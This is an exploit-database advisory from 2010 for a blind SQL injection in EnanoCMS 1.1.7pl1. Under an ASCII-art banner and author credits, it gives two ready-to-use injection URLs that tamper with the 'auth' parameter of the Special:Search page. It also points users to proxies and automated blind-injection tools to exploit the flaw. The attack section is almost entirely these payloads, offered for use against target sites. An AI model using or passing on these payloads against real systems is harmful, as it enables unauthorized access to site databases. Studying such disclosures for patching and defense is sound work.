Text :  


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit
0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 Sweet Alg3rien Haxxz0or
1 ######################################
Exploit Title: EnanoCMS BlindSQL injection
Date: 26/08/2010
Author: Sweet
Contact : charif38@hotmail.fr
Software Link: http://enanocms.org
Download: http://enanocms.org/download
Version: enano-1.1.7pl1
Tested on: WinXp sp3
Risk : Hight
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Exploits :

if you got some probleme to exploit the bug please try to use paros proxy
or some automated blind sql injection tools

http://www.target.com/enanoCMS
path/index.php/?title=Special%2ESearch&auth=111-222-1933email@address.t
st'+and+31337-31337=0+--+&q=111-222-1933email@address.tst


http://www.target.com/enanoCMS
path/index.php/?title=Special%2ESearch&auth=111-222-1933email@address.t
st"+and+31337-31337="0&q=111-222-1933email@address.tst


thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com ,
exploit-db.com

Saha Ftourkoum et 1,2,3 viva L'Algerie :))

  References :  

None